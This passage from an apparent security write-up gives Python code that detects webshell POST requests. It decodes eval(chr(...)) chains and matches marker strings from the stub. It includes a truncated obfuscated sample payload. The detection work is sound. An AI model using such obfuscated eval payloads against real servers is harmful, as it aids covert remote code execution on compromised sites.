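# Beginning of the POST body from the capture above, cut after the first two statements.
SAMPLE_BODY = (
    "ant=@eVAl(cHr(64).ChR(105).ChR(110).ChR(105).ChR(95).ChR(115).ChR(101).ChR(116)"
    ".ChR(40).ChR(34).ChR(100).ChR(105).ChR(115).ChR(112).ChR(108).ChR(97).ChR(121)"
    ".ChR(95).ChR(101).ChR(114).ChR(114).ChR(111).ChR(114).ChR(115).ChR(34).ChR(44)"
    ".ChR(32).ChR(34).ChR(48).ChR(34).ChR(41).ChR(59).ChR(64).ChR(115).ChR(101)"
    ".ChR(116).ChR(95).ChR(116).ChR(105).ChR(109).ChR(101).ChR(95).ChR(108).ChR(105)"
    ".ChR(109).ChR(105).ChR(116).ChR(40).ChR(48).ChR(41).ChR(59));"
)

CHR_CALL = re.compile(r"\bchr\((\d{1,3})\)", re.IGNORECASE)
EVAL_CHR = re.compile(r"@?eval\s*\(\s*chr\(", re.IGNORECASE)

# Strings present in the decoded default stub shown on the page.
MARKERS = (
    '@ini_set("display_errors", "0")',
    "@set_time_limit(0)",
    "function asenc(",
    "function asoutput(",
    '$_SERVER["SCRIPT_FILENAME"]',
    "open_basedir",
)


def decode_chr_chain(value: str) -> str:
    """Turn chr(64).ChR(105)... back into the text it builds (case-insensitive)."""
    return "".join(chr(int(n)) for n in CHR_CALL.findall(value))


def parse_form(body: str) -> list:
    """Minimal x-www-form-urlencoded parser; only '&' separates fields, so ';' in
    values (which older parse_qs versions treat as a separator) is left alone."""
    fields = []
    for pair in body.split("&"):
        name, _, value = pair.partition("=")
        fields.append((unquote_plus(name), unquote_plus(value)))
    return fields


def inspect_post(body: str) -> list:
    """Flag form fields that eval() a chr()-built string and report what they decode to."""
    findings = []
    for name, value in parse_form(body):
        if not EVAL_CHR.search(value):
            continue
        decoded = decode_chr_chain(value)
        findings.append({
            "param": name,
            "chr_calls": len(CHR_CALL.findall(value)),
            "decoded": decoded,
            "markers": [m for m in MARKERS if m in decoded],
        })
    return findings


if __name__ == "__main__":
    for finding in inspect_post(SAMPLE_BODY):
        print(finding["param"], finding["chr_calls"], finding["markers"])
        print(finding["decoded"])
```

The eval-plus-chr shape is the robust part of the signature; the marker list only confirms which stub was sent, and a chain of several hundred chr() calls in one field is suspicious on its own even when none of the markers match.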
